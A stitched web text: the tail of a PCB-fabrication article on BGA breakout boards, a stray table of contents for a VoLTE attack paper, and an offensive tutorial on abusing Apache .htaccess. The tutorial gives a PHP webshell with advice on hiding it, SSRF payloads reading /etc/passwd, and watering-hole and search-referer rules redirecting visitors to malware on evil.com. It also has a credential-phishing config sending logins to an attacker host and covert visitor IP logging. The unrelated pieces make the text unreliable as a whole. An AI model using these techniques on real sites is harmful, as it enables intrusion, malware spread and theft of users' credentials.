The design of the PCB can be realized using KiCAD, one of the most popular electronics design automation (EDA) software.
If you are not familiar with KiCAD, many great tutorials are available like KiCAD Quick-Start Tutorial.
The design of a breakout board follows the same process as for any other board:
- Create an electronic schematic for your board in eeschema, and define the components that are specific to your project, for example your flash chip.
- Create the specific footprint for your flash chip in pcbnew. This is where the information from the datasheet that we looked at earlier is useful. We will add a 4x6 grid representing the BGA grid, and two 1x4 connectors linked to the 8 useful pins. The final step is to add routes to connect our components.
Our design is done, how do we transform a KiCAD project into a working PCB?
PCB fabrication
A PCB is basically a sandwich made of a layer of substrate between two layers of copper. The substrate is usually made of FR-4 (glass-reinforced epoxy laminate) but other cheaper materials can also be found. Routes are traced on the copper layer and the excess copper is then removed.
Several techniques exist to remove the unwanted copper, we tried the following:
- Etching;
- CNC milling.
Both techniques are detailed below: we used the etching technique to build the 4x6 BGA PCB and the milling technique to build the 5x5 BGA PCB.
Etching
Etching refers to the process of using a chemical component to "bite" into the unprotected surface of a metal. We use ink as a way to delimit the traces and protect the bits of copper to keep.
- We use the toner transfer method to reproduce the design on copper. The design is printed on a glossy sheet of paper using a laser printer. The sheet of paper is then taped to the piece of copper/fiber glass substrate, and heat and pressure are applied to get the design out of the paper onto the copper board. Usually, this technique uses a regular clothes iron to apply heat and pressure. We found out that using a laminator is way more efficient as the heat and the pressure applied are more uniform.
- Next step is the actual etching. The board is immersed into a chemical solution which will remove excess copper, except where the toner is.
Our breakout board after etching, still with the transferred toner attached:
And after removing the toner with acetone:
The PCB board is now ready for microsoldering. Microsoldering is like soldering but with tiny components, hence it requires a microscope.
Another difference with traditional soldering is the packaging of the solder. Traditional soldering uses solder in the form of wire while BGA microsoldering uses solder balls.
Next, we can start reballing:
- put a new solder ball in each slot and apply heat to melt the solder balls in place;
- align the chip and the board;
- reflow.
The board being reballed:
And the final result with the chip and the board after microsoldering:
CNC Milling
Alternatively, a CNC milling machine can be used to carve out bits of unwanted copper. Rather than removing all the unwanted copper, the CNC will simply isolate the required tracks and leave the excess copper in place.
1. The 5x5 BGA format was used to build a PCB. While the 4x6 version was a breakout board, we designed the 5x5 version so that it can be plugged directly into a universal EEPROM programmer ZIF socket. As we've seen in the datasheet, this chip also exists in a SOP8 package, so we've chosen to mimic a DIP8 pin header reproducing the same pin layout as the SOP8. So for the universal EEPROM programmer, this setup will be virtually the same as reading the SOP8 chip via a classic SOP8-DIP8 adapter.
2. The footprint for the chip is somewhat similar to the one we designed for the 4x6, but with a 5x5 grid, the 1x4 connectors closer together (as for a DIP8), and somewhat more tortuous routing to respect the SOP8 layout, which is unfortunately completely different from the BGA one.
3. KiCAD cannot directly produce a file compatible with a CNC, therefore we'll use Flatcam, which takes a Gerber file and lets us define a path for the CNC to isolate the desired copper tracks. To avoid short-circuit issues, we also define an area under the BGA chip where the unwanted copper is removed entirely.
4. We then pass the produced G-code file to bCNC, which is in charge of controlling the CNC. It has some nice features such as auto-levelling, i.e. measuring the actual height of the board at several points (because nothing is perfectly flat) and producing the heat map you can see in the snapshot below.
Milling in action, corresponding to the tracks highlighted in green in bCNC:
- Board fully milled:
Close up of the final result where we can distinguish the pattern of the flatcam geometry path under the BGA:
6. Next, we apply some solder mask, which is the characteristic green layer protecting the copper from oxidation, and cure it with UV light.
7. The solder mask covered the pads of the BGA and of the 1x4 connectors, they are unusable like this. We scratch manually the thin layer of paint to free the pads.
- Tinning step, where we apply solder on all pads:
- Back to the CNC to drill the holes and cut the edges of the board:
- Final board with the BGA chip soldered and ready to be inserted in a universal EEPROM programmer:
As we've chosen to mimic the SOP8 pinout, we simply have to tell the programmer that our chip is the SOP8 version!
Bonus: the horror show
Here is a compilation of our best failures, because things don't always go as planned, but we learned a lot through these experiments and we are now ready for the next IoT project.
Toner transfer is not always as easy as it sounds...
Milling on the CNC with the right depth neither...
Failing at finding a plastic that doesn't adhere to the green mask... (eventually, IKEA freezer bags turned out to work very well)
Attempt to mill the green mask...
Second attempt with a tool mounted on a spring: looks almost good but actually all tracks were cut from the pads...
Third attempt by adding some solder first, in the hope of making the tracks thicker...
Created a lake of green mask too thick to cure with UV light, and when the surface of the icy lake breaks...
Conclusion
That concludes our first article, in which we saw how to desolder a flash chip, design a PCB, and fabricate it using two different techniques.
Acknowledgements
Thanks to all Quarkslab colleagues who proofread this article and provided valuable feedback.
TABLE OF CONTENTS
1 ABSTRACT
2 INTRODUCTION
3 RELATED WORK
4 BACKGROUND
4.1 Security Protocols
4.2 ISIM Authenticate
4.3 IP Multimedia Subsystem
5 PRACTICAL ATTACKS
5.1 A1: Sniffing VoLTE/VoWiFi Interfaces
5.2 A2: ISIM sniffing for extracting CK/IK
5.3 A3: User location manipulation
5.4 A4: Roaming information manipulation
5.5 A5: Side channel attack
6 RESULTS
6.1 R1: Information Disclosures
6.2 R2.1: Keys in GSM SIM
6.3 R2.2: Authentication using IK
6.4 R3: User Location Manipulation
6.5 R4: Roaming Information Manipulation
6.6 R5: Side channel
7 MITIGATION
8 CONCLUSION
9 REFERENCES
http://insecurity.zone || Red Team || [SOON] Interactive hacking tutorial platform || Tools & exploits || Wargames/CTF's || IRC: http://irc.land
Sep 5
Utilizing .htaccess for exploitation purposes — PART #1
Author — MLT(@ret2libc)
This tutorial will cover ways in which .htaccess can be used within the context of web-based exploitation. It will detail a few different techniques: some are useful for penetration testing and bug bounty hunting, others are capable of less damage but can still be abused maliciously, and some are methods that a blackhat hacker could use to perform watering hole attacks or infect users of compromised websites with malware. This guide will also detail a few other tricks that can efficiently abuse .htaccess for an attacker's gain.
This is the first of a two-part series regarding uses of htaccess for exploitation purposes. I will cover some basic and somewhat well-known methods here, along with a few lesser known methods. In part 2, I will be moving onto more advanced methods of exploitation through use of htaccess.
In this guide I will attempt to explain various non-conventional uses of .htaccess which can be extremely useful for exploitation and post-exploitation purposes. I'm assuming most readers will have an understanding of .htaccess, but for those who don't, I will offer a brief explanation. Regardless of how familiar you are with htaccess rules, I'm hoping this should still be easy enough to grasp.
Some of the methods I will be covering are a little outdated, but many of these still work to this date, and even the outdated methods discussed can still work in plenty of instances when an attacker is targeting a server which doesn't have all of its software up to date.
I will begin with a few methods that aren’t necessarily “exploits” as such, but rather just means of using mod_rewrite to be a general nuisance.
For those of you who aren’t familiar with what .htaccess is, here is a short explanation (taken from htmlgoodies.com because I’m lazy):
htaccess is short for Hypertext Access, and is a configuration file used by Apache-based web servers that controls the directory that it “lives” in — as well as all the subdirectories underneath that directory.
Many times, if you have installed a Content Management System (CMS), such as Drupal, Joomla or Wordpress, you likely encountered the .htaccess file. You may not have even had to edit it, but it was among the files that you uploaded to your web server. Some of the features of the .htaccess file include the ability to password protect folders, ban users or allow users using IP addresses, stop directory listings, redirect users to another page or directory automatically, create and use custom error pages, change the way files with certain extensions are utilized, or even use a different file as the index file by specifying the file extension or specific file.
In short, it’s a set of rules you include on your web-server (in a file named .htaccess) which allows you to perform options such as password protecting a directory or creating aliases for extensions so for example if you had a page such as http://site.com/something/file.php you could set a htaccess rule so that when the page loads it would take the user to http://site.com/something/file (hiding the extension) — or you could use it to do something like 302 redirect one page to another or HTTP 403 a directory.
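The extension-hiding behaviour described above is typically implemented with mod_rewrite; here is a minimal sketch (the paths are illustrative):

```apacheconf
# Serve /something/file as /something/file.php when that file exists,
# so the .php extension never appears in the URL.
RewriteEngine On
RewriteCond %{REQUEST_FILENAME}.php -f
RewriteRule ^(.*)$ $1.php [L]
```

The RewriteCond guard ensures only URLs with a matching .php file on disk are rewritten, so ordinary static files are unaffected.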
Here is an example of what a htaccess file looks like:
### MAIN DEFAULTS
Options +ExecCGI -Indexes
DirectoryIndex index.html index.htm index.php
DefaultLanguage en-US
AddDefaultCharset UTF-8
ServerSignature Off

Interesting side note: you should always add the ServerSignature Off directive, because it prevents banner info containing your server details from being displayed on directory listings (which makes the recon stage slightly more awkward for an attacker, and every little helps!). That being said, this should ideally be done through your httpd.conf rather than your .htaccess file.
What I’m going to be primarily focusing on specifically is the rewrite module for apache within .htaccess (mod_rewrite) — this allows redirects to take place. So without further ado, let’s begin.
Trolling internet users with continuous pop-ups:
The first method I will be discussing is how to abuse mod_rewrites to troll people with continuous pop-ups on the site that they are attempting to use.
This is a very simple method, you would upload an image to your server and then you would use htaccess to password protect a directory and redirect the image to a file within that password protected directory. You will also need a .htpasswd file in addition to .htaccess which will contain the login credentials for the password protected directory.
This method is just a little fun, doesn’t have any real value but I’ve seen it exploited on popular forums before and it is pretty effective at trolling the hell out of people, so there’s always that.
For the purpose of this example, lets assume that we have two files, lol.jpg and umad.jpg wherein lol.jpg is stored in a public directory and umad.jpg is stored in a password protected directory.
here is an example of what your .htaccess file should look like:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg /protected-directory/umad.jpg [NC]
AuthUserFile /home/usr/.htpasswd
AuthName “r u mad tho”
AuthType Basic
require user lolololololol

In addition to this, you would need to set up a .htpasswd file that looks something like the following:
username:encryptedPass
The username in this instance needs to match the username that you added to your .htaccess file. As for the encrypted password, this is generated via PHP’s crypt(); function. If you don’t want to use PHP (I don’t blame you), then online generators are also available to encrypt the password value in your .htpasswd file.
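If you'd rather avoid both PHP and online generators, the entry can also be produced from the command line; a sketch using the openssl CLI (the username matches the example above, and the password value is illustrative):

```shell
# Generate an .htpasswd entry using Apache's MD5-based scheme (apr1),
# which Apache's basic auth accepts in .htpasswd files.
printf 'lolololololol:%s\n' "$(openssl passwd -apr1 'hunter2')" > .htpasswd
cat .htpasswd
```

The resulting line has the form `username:$apr1$salt$hash` and can be dropped straight into the .htpasswd file referenced by AuthUserFile.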
You could then set the path to lol.jpg as your signature on a forum, for example, and every time someone views your thread or every time you post in a thread, a prompt to enter a username/password will repeatedly pop up on their screen, which can get pretty annoying for them. It doesn't necessarily have to be a forum, either: any website with an option for a custom avatar or profile image can be abused this way (assuming it lets you set the image from a remote URL rather than only via a file upload form). Anyone whose browser renders your image will be repeatedly spammed with password prompt boxes, assuming the site you're doing this on hasn't come up with some way of patching it. This could be used for forum signatures, profile avatars, or pretty much anything with image upload functionality that allows you to grab the image from a remote URL.
Browser fingerprinting and IP logging without user interaction:
This method is also utilizing a redirect trick, but it will allow you to trace people’s IP addresses (or do pretty much anything that you can do via executing PHP code) without them even being aware. This will allow you to perform browser fingerprinting in a stealthy manner, generally with the target being completely unaware.
Once again, it’s a simple mod rewrite like so (the only difference is we are redirecting to a PHP file here instead of a password protected dir):
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg /path/to/evil.php [NC]

Let's assume an attacker has two files hosted on their server, lol.jpg being a completely innocent image file, and evil.php being a PHP script used for information gathering.
Now, the plan here is to trick the server into thinking a valid image has been included. From the server's point of view, it is making a request to an image file. When the request redirects to the PHP script, though, no valid image is seen, so the server would generally not include the image on the page (and no PHP would be executed). However, we can use PHP dynamic images to trick the server into thinking it is including lol.jpg in the page rather than evil.php — we can make the PHP script output an image, and it will also run any malicious code alongside it (logging an IP address in this case). This can be achieved via the imagecreate(); function, here is an example:
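A minimal sketch of such a dynamic-image logger, assuming PHP's GD extension is available (the log path and logged fields are illustrative):

```php
<?php
// evil.php - reached via the rewrite rule whenever lol.jpg is requested.
// First, record whatever the requesting client leaks about itself.
$entry = sprintf("%s | %s | %s | %s\n",
    date('c'),
    $_SERVER['REMOTE_ADDR'] ?? '-',
    $_SERVER['HTTP_USER_AGENT'] ?? '-',
    $_SERVER['HTTP_REFERER'] ?? '-');
file_put_contents(__DIR__ . '/hits.log', $entry, FILE_APPEND);

// Then emit a real image so the embedding page still renders normally.
header('Content-Type: image/png');
$im = imagecreate(1, 1);                 // 1x1 tracking pixel
imagecolorallocate($im, 255, 255, 255);  // white background
imagepng($im);
imagedestroy($im);
```

Because the response carries an image content type and valid image bytes, the including site has no reason to suspect anything other than a plain image was served.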
In the case of the example above, once the image is rendered in the users browser, it will write their user agent, IP address, referer header and other useful information for fingerprinting to a file on the attackers server. This would then allow an attacker to obtain information about the users location, or even craft tailored payloads in order to exploit the users browser.
So for example if there was a site where you had a profile, and you could set your profile image from a remote URL, then you could include lol.jpg as your image (from your URL) and htaccess would redirect it to the PHP script which then outputs an image, and the server gets tricked into thinking evil.php is lol.jpg and includes the image as your profile picture while executing any other PHP code that runs alongside it (in this case logging the IP address and user agent of anyone who views your profile). In addition to rewrite rules being used for this, AddType may also be used to achieve the same effect.
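A sketch of the AddType variant mentioned above: instead of a redirect, the attacker's own server is configured to run .jpg files through the PHP interpreter, so lol.jpg can itself be the logging script while still outputting a valid image.

```apacheconf
# On the attacker's server, in the directory hosting lol.jpg:
# hand .jpg files to the PHP handler so lol.jpg executes as PHP.
AddType application/x-httpd-php .jpg
```

Whether this handler name works depends on how PHP is wired into the particular Apache install; it is shown here because the same AddType idiom appears later in the article.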
Filter Evasion for web-based vulnerabilities:
htaccess has several uses for filter evasion regarding web-based vulnerabilities. The two attack vectors that I will be discussing in this post are Server-Sided Request Forgery and Arbitrary File Upload.
Server-Sided Request Forgery:
For those who aren't familiar with SSRF, it allows you to use various URI schemes to view local resources instead of requesting a remote resource. For example, if there was a page like http://example.com/vuln.php?url=http://somesite.com then you could change the '?url=' GET parameter to localhost to probe for information about a service running on a specific port, e.g.:
http://127.0.0.1:3306
This would disclose information regarding the MySQL daemon running on the vulnerable server.
file:/etc/passwd
This would allow an attacker to achieve Local File Disclosure through SSRF, allowing them to read the contents of local system files.
Generally, most secure websites will have filters in place to prevent SSRF from taking place. There are many bypass methods for SSRF, but I’m going to be focusing specifically on a context where it only allows the input to be a remote resource or a valid (or seemingly valid) URL. So assuming an attacker will be blacklisted if they attempt redirection to localhost/127.0.0.1/0.0.0.0 or file:// uri scheme, then they could setup a mod_rewrite with htaccess like so:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg http://127.0.0.1:3306 [NC]

or to read local files:
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg file:/etc/passwd [NC]

Of course, this technique can also be used to achieve RCE assuming there is a vulnerable service such as sftp, gopher, memcached or something similar on the target server.
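For instance, if the vulnerable fetcher follows redirects into other URI schemes, the same trick can point at an internal service; a hypothetical example targeting a local Redis instance via gopher://:

```apacheconf
# Redirect the "image" into gopher:// to smuggle a raw TCP payload to an
# internal service (here: Redis on 6379). This only works if the client
# honours the gopher scheme after following the redirect.
Options +FollowSymlinks
RewriteEngine on
RewriteRule lol.jpg gopher://127.0.0.1:6379/_PING%0d%0a [NC,R=302]
```

The target host, port and payload here are illustrative; in practice the payload would be tailored to whichever internal service is exposed.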
This will potentially bypass any blacklist in place as you could add http://example.com/lol.jpg as the input for the vulnerable script, then the vulnerable script could instead make a request to http://127.0.0.1:3306 or file:/etc/passwd after making the original request to http://example.com/lol.jpg — causing the SSRF to be exploited and the filter to be bypassed (in this example disclosing MySQL version or passwd output)
There are many cases where this won’t work, but I’ve used this for bounties on various programs in the past with success.
Arbitrary File Upload:
In addition to having uses within SSRF, .htaccess can also be abused for arbitrary file upload in some cases. If there was a scenario where a vulnerable website had a file upload form with a blacklist-based filter in place (blocking specific extensions such as .php or .phtml), then in some cases it could be possible to upload a .htaccess file, resulting in a varying degree of consequences.
htaccess has a default deny rule which prevents it from being accessible over the internet. If an attacker has the ability to override htaccess, the first thing they will need to do is disable the deny rule so that it can be accessible by navigating to the relevant URL path, to do this, an attacker would upload a htaccess file that looks something similar to this:
<Files ~ “^\.ht”>
# overriding deny rule
# making htaccess accessible from the internet
Require all granted
Order allow,deny
Allow from all
</Files>

This now means that an attacker can freely view htaccess by simply navigating to the URL (http://site.com/.htaccess).
If an attacker has the ability to override the current .htaccess file in use, and replace it with their own, then this would allow them to perform all kinds of attacks on the server, ranging from application-level DoS to full-blown Remote Command Execution. Whether this works is dependent on which Apache modules are enabled. If modules such as mod_info and mod_status are enabled then an attacker can perform information disclosure and Remote Command Execution respectively.
Once an attacker has overridden the sites original htaccess file and disabled the default deny rule, they could perform Remote Command Execution by adding the following line to their custom htaccess file:
AddType application/x-httpd-php .htaccess
This will make the server treat htaccess files as PHP scripts, and, paired with the method above to override the vulnerable servers original htaccess file, an attacker could then navigate to the URL where the htaccess file is stored on the server in order to execute their PHP code. The payload that the attacker crafts would be in the form of a comment within the htaccess file, for example:
AddType application/x-httpd-php .htaccess
# <?php echo “get pwned”; ?>

Of course, this isn't limited to PHP. You could use the same method to spawn a JSP shell or something similar (all depending on which technologies are running on the server). In order to do this, you would need to change the value for AddType to correspond to the code that you wish to execute.
If, for some reason, it isn’t allowing htaccess to be accessed despite the deny rule being disabled (e.g. as a result of an external config for the HTTP daemon or a CMS-specific config file), then an attacker could instead use AddType to set a more ‘innocent’ file such as a JPG to be treated as a PHP file. They could then include some malicious PHP code within their JPG image, upload the image, and navigate to the path where the image is stored in order for their code to execute.
If the attacker is exploiting an outdated system with Windows 8.3 (SFN) filename conventions, then it may be possible to circumvent a blacklist-based filter that is stopping files named ‘htaccess’ from being uploaded. The shortname for .htaccess can be used in cases like this. An attacker could upload a file named ‘HTACCE~1’, and if 8.3 filename conventions are in use, then this will be the equivalent of uploading a file named ‘.htaccess’. Assuming such filename conventions are in use (not too common these days), this could be used to bypass signature-based filters and blacklists that are in place for file upload functionality.
Watering hole attacks and mass infecting site users with malware:
If an attacker manages to compromise a website and has limited (non-root) access yet still has the ability to make modifications to htaccess, then this can be used for a variety of exploitation cases. The first example of this that I will cover is how an attacker can modify htaccess to act as a practical watering hole attack.
If an attacker has a specific user in mind that they want to target, and they know the IP address of the user, alongside websites that the user frequents, then watering hole attacks are a possibility if the attacker has the ability to edit or override the htaccess file of a site that their victim frequently visits (through having partial access or the ability to override the sites current htaccess file through means of arbitrary file upload). Let’s assume the attacker has a target in mind, and knows that their IP address is 151.121.2.69 and that they frequently visit a website called example.com — If the attacker found a method to overwrite the htaccess file for example.com, then they could setup a htaccess rule like so:
RewriteCond %{REMOTE_ADDR} ^151\.\121\.2\.69$
RewriteCond %{REQUEST_URI} !/GetHacked.php
RewriteRule .*\.(htm|html|php)$ /GetHacked.php [R,L]

With the example above, any regular user visiting example.com would be able to browse the website as normal. If the victim were to visit example.com, they would be redirected to GetHacked.php (it would be more stealthy than this of course, but that’s just an example). Generally the page that the victim would be redirected to would look identical to the site that they were intending to connect to in terms of design (and would have the same domain name), but they would be redirected to a separate, unique page on the site which would then serve malware, hook their browser, or exploit their browser via a zero-day vulnerability. If done properly, the victim would be completely unaware of the fact that anything out of the ordinary had taken place. They would continue to browse the site as usual, having no idea that they had fallen victim to a watering hole attack. If planned out properly, this can lead to a highly sophisticated, stealthy, targeted attack against someone while they remain completely oblivious to what happened.
Although the method I just described is a targeted watering hole attack aimed at a specific victim, it is also possible to use htaccess to serve malware to the userbase of a website in general through a series of rewrite rules. This is generally achieved by checking the referer header to see which site the user is coming from, and redirecting them to malware based upon that. Usually an attacker wanting to spread malware would gain access to a popular website and then create some rewrite rules for htaccess that would cause anyone visiting the site from a popular search engine to be redirected to malware or a browser exploit. This could be achieved like so:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*duckduckgo.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*baidu.*
RewriteRule ^(.*)$ http://evil.com/malware.ext [R=301,L]

In addition to malicious hackers compromising websites and modifying the vulnerable sites’ htaccess file in order to spread malware or build a botnet, another common application of this technique is to push traffic to sites that pay for traffic. If a hacker was to compromise some popular websites and modify their htaccess files to setup redirect rules, they could make it so that any visitors to the site arriving from a search engine are instead redirected to a site of the hackers choice. This is a popular way of making money within the blackhat community, as many websites will pay for traffic pushed to their domain, and by hacking high Alexa or Google PR ranked websites and modifying their htaccess file in that manner, it can be highly profitable due to the sheer amount of traffic generated.
Another thing to take note of is that this can also be used as a defence mechanism through use of htaccess rules on your own website. For example, imagine the hypothetical situation that you operate a website and you are aware that users of an online hacking forum are trying to target your site, you could setup htaccess rules so anyone coming directly from the malicious site to your site is redirected to malware, and pre-emptively counter-hacked before they have the opportunity to cause any damage. If you are aware that people from evil-site.com are trying to target your website, then you could setup a htaccess rule like so:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*evil-site.com
RewriteRule ^(.*)$ http://hack-the-hackers.com/malware.ext [R=301,L]

As well as the methods described above to infect site users with malware, a similar thing can be achieved through use of error documents. You can add htaccess rules so that when common HTTP status code errors are triggered, the user is redirected to malware:
ErrorDocument 403 http://evil.com/payload.php
ErrorDocument 404 http://evil.com/payload.php
ErrorDocument 500 http://evil.com/payload.php

Information Disclosure through htaccess:
There are two primary forms of information disclosure through htaccess files. One requires access to the compromised server, the other does not.
Occasionally htaccess files can be readable by anyone due to a server misconfiguration or the lack of a default deny rule. When performing a penetration test, it's always useful to check whether htaccess is readable (9 times out of 10, it won't be) so you can see which rewrite rules and other restrictions or settings are in place. You'll be surprised at what information can be disclosed, and at how often you'll come across sites that fail to properly configure their server or HTTP 403 their htaccess file. For context:
It’s always worth checking whether you can read .htaccess on a site that you’re performing an audit on. To do this, simply navigate to the following URL on the site that you’re testing:
http://example.com/.htaccess
Generally you will receive a HTTP 403 response, but in some cases you will have the ability to read .htaccess — It’s also worth pointing out that the file may not always be named .htaccess, there are a few common variations to look out for:
- OLD.htaccess
- 1.htaccess
- dot.htaccess
- backup.htaccess
- _.htaccess
- -.htaccess
In addition to this, htaccess will be a text file within certain CMS’ (some examples being Joomla and OpenCart) — so depending on which CMS the server is running, it’s sometimes worth checking for htaccess.txt to see if that is readable. Here is an example (on a Joomla install):
http://www.nationalcrimeagency.gov.uk/htaccess.txt
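Checking the variants above is easy to script; a sketch that builds the candidate URL list (the target domain is a placeholder, and you would feed the resulting file to curl or your tool of choice):

```shell
# Build a list of candidate htaccess paths to probe on a target site.
base="http://example.com"
: > urls.txt
for f in .htaccess OLD.htaccess 1.htaccess dot.htaccess backup.htaccess _.htaccess -.htaccess htaccess.txt; do
  echo "$base/$f" >> urls.txt
done
# Then probe each candidate and note anything that is not a 403/404, e.g.:
#   xargs -n1 -I{} curl -s -o /dev/null -w '%{http_code} {}\n' {} < urls.txt
cat urls.txt
```

Any candidate returning a 200 with rule-like content is worth reading in full, since it may expose rewrite rules, protected paths, or auth file locations.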
The second (and far more effective) version of information disclosure through .htaccess is in a context where an attacker has limited access to a server. Let's assume that they can't edit files or perform other actions, but they have the ability to edit .htaccess (or replace htaccess through means of arbitrary file upload). In addition to bypassing restrictions such as PHP safe mode and spawning a shell (which I will cover in the next section), it can also be used to disclose information on the server in order to further aid an attack. Assuming syscalls are disabled and the methods for abusing htaccess to modify php.ini (to enable syscalls) aren't working, then information disclosure is probably the next course of action for an attacker.
Assuming you can execute PHP code through a malicious htaccess file, there are the obvious means of information disclosure that can be used through PHP’s functionality (although a LOT more than information disclosure can be done if you have the ability to execute syscalls rather than just run PHP code). Assuming you don’t have the ability to execute syscalls, but can still execute PHP, then the most obvious form of information disclosure would be through the use of the phpinfo(); function. You would first override the deny rule as explained earlier, then you would navigate to the URL where htaccess is located in order to display phpinfo (giving you the PHP version, kernel version, and other useful information):
AddType application/x-httpd-php .htaccess
# <?php phpinfo(); ?>

Another possibility (although this is very easily detected by the sysadmin) is that you can change the content-type for server-sided scripts, allowing an attacker to read the source code for PHP files. This means they would then have the ability to perform a whitebox source code audit on the site, enabling them to potentially find more vulnerabilities:
<FilesMatch “\.ph.*$”>
SetHandler text/plain
AddType text/plain .php
</FilesMatch>

If an attacker's goal is to be stealthy, then this probably isn't the best option. This could be achieved in a more stealthy manner by setting AddType text/plain filename.php for the name of a specific file that they wish to view the source code for (before reverting it back to its original content-type). Doing this one file at a time would drastically reduce the chances of a sysadmin detecting that something was up (it's going to be pretty obvious to them that something is wrong if EVERY page on their website is leaking its source code for anyone to see). Assuming an attacker has limited access and lacks read permissions for PHP files, then this can be highly valuable as it will allow them to find more critical vulnerabilities that would allow them to escalate privileges and gain a higher level of access.
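A sketch of that stealthier per-file variant (the target filename is illustrative, and the directive pairing is an assumed equivalent of the AddType approach):

```apacheconf
# Leak the source of one chosen file only, leaving the rest of the
# site behaving normally so the change is harder to notice.
<Files "config.php">
    SetHandler default-handler
    ForceType text/plain
</Files>
```

SetHandler default-handler makes Apache serve the file as static content instead of executing it, and ForceType ensures the browser renders the source as plain text.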
It is also possible to disclose server-status and server-info by appending the following lines to your malicious htaccess file through use of the SetHandler directive:
SetHandler server-status
SetHandler server-info

This will leak useful information about the server, alongside the IP addresses of all users connecting to the server (allowing an attacker to gather intel on the userbase of their target website). Depending on the technologies running on the target website, SetHandler can also be used to disclose other kinds of information (for example information pertaining to the LDAP configuration or things like caucho-status — this won’t be too common since java servlets are practically always handled via Tomcat within Apache now rather than Resin, but there are equivalents for Tomcat and other technologies).
The method described for performing browser fingerprinting and IP logging users can also be utilized for information disclosure (this doesn’t require any form of access or vulnerability to the target server). A PHP dynamic image can be used in conjunction with a htaccess file hosted on your own server, and then an attacker can input the URL to the image somewhere on the target server, causing the target server to request the image and the backend IP address of the target server to be written to the logfile on the attackers server. This can be used to bypass services like Cloudflare in order to reveal the real IP address of a server.
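The attacker-side half of this trick is just a web endpoint that serves a tiny image while writing down who fetched it. Below is a minimal Python sketch of such a logger (the original post implies a PHP dynamic image; this stand-alone server, its names, and the bare PNG payload are my own illustration):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import threading

hits = []  # (ip, user_agent) recorded for every fetch of the "image"

class ImageLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the requester before serving the decoy image
        hits.append((self.client_address[0], self.headers.get('User-Agent', '')))
        self.send_response(200)
        self.send_header('Content-Type', 'image/png')
        self.end_headers()
        self.wfile.write(b'\x89PNG\r\n\x1a\n')  # just the PNG magic, enough for a demo

    def log_message(self, *args):
        pass  # keep stdout quiet

def start_logger(port=0):
    # port=0 lets the OS pick a free port
    server = HTTPServer(('127.0.0.1', port), ImageLogger)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

If the image URL is planted somewhere the target server will fetch it from, the entry recorded in hits is the backend IP, regardless of any CDN sitting in front of the site.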
Harvesting login credentials by phishing:
There are a few different ways that an attacker can use htaccess in order to harvest login credentials and spear phish users. The methods I will discuss here are spear phishing through use of ErrorDocument. In addition to being able to serve malware through the use of custom error documents, you can also create documents using HTML/CSS/JS, meaning that someone can easily create an iframe phisher to harvest credentials. It's just as simple as:
ErrorDocument 403 <YourHtmlCode>
When the user reaches a 403 page (or whatever HTTP status code the attacker chooses to set), they can be served a phony login page through use of an iframe or document.write(); in order to trick them into handing over their credentials.
Another method of phishing via making modifications to htaccess on a compromised site is by prompting the user with a username/password box and then sending the inputted credentials to a remote server controlled by the attacker, here is a htaccess file created by wireghoul in order to achieve this:
# This file will prompt the user for username and password
# And send the credentials to your server in plaintext (http basic auth)
# You will need to edit this file and create a script to collect the
# credentials on your server
AuthType Basic
AuthName ""
AuthRemoteServer evil.com
AuthRemotePort 80
AuthRemoteURL /phish/
require valid-user
# Your script needs to return the corresponding 401 or 200 OK response codes
# to the mod_auth_remote module.

In part #2 of this blog series, I will be explaining some unique and complex phishing methods that utilize htaccess which are virtually undetectable.
Using htaccess to spawn a shell:
If an attacker has limited access to the server they are trying to target, or a vulnerability that allows them to override the currently existing htaccess file, then it is possible to turn htaccess into a web-based HTTP GET shell using the methods described earlier in this post. Even if the attacker already has shell access to the server, it may be useful for them to add an additional shell to htaccess in order to maintain access in the instance that their original shell is detected and removed.
Here is an example of what a fully functional htaccess shell would look like:
# htaccess backdoor shell
# this is relatively stealthy compared to a typical webshell

# overriding deny rule
# making htaccess accessible from the internet
# without this you’ll get a HTTP 403
<Files ~ “^\.ht”>
Require all granted
Order allow,deny
Allow from all
</Files>

# Make the server treat the .htaccess file as a .php file
AddType application/x-httpd-php .htaccess

# <?php system($_GET['hax']); ?>
# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?hax=YourCommand

# If system(); isn't working then try other syscalls
# e.g. passthru(); shell_exec(); etc
# If you still can't execute syscalls, try bypassing php.ini via htaccess

Generally, if an attacker were using htaccess as a means of maintaining shell access to a compromised site, they would add some form of padding/whitespace or additional (harmless) directives to the htaccess file, making it longer so that the sysadmin is less likely to notice any suspicious-looking PHP code within it. For htaccess shells that rely more heavily on stealth, I'd suggest incorporating non-alphanumericism into your PHP code (I'll be talking more about non-alphanumericism in an upcoming blog post regarding methods of maintaining access to a compromised server).
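Driving such a shell is just a matter of URL-encoding commands into the hax parameter, as in the example URL in the comments above. A small Python helper (the helper name is my own):

```python
from urllib.parse import urlencode

def build_shell_url(base, cmd, param='hax'):
    # e.g. http://vulnerable.com/.htaccess?hax=YourCommand
    return base + '?' + urlencode({param: cmd})
```

urlencode takes care of spaces and shell metacharacters in the command, so multi-word commands survive the trip through the query string.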
Also, for a comprehensive list of various forms of shells that can be used within htaccess in instances where PHP isn’t available, I would strongly recommend looking into wireghoul’s ‘htshells’ repository.
Final Notes (and what’s coming next):
In part #2 of this series, I will be explaining how to use htaccess to “counter-hack” anyone who tries to target your site, I will be covering use of auto_append_file to make every page on a website serve malware, I will also be explaining various methods of symlink bypasses using htaccess (some of which would allow an attacker to compromise thousands of sites at once on a shared host) that currently work for a variety of environments, alongside methods of bypassing HTTP 403 through use of htaccess.
In addition to this, I will be discussing how to bypass PHP’s safe mode with htaccess and how to make modifications to php.ini in order to be able to spawn a shell more effectively and how an attacker could have a higher level of control over a target server through use of htaccess exploitation (through the ability to modify php.ini to their choosing). I will also be touching lightly upon some of the more advanced phishing techniques that can be achieved by abusing htaccess.
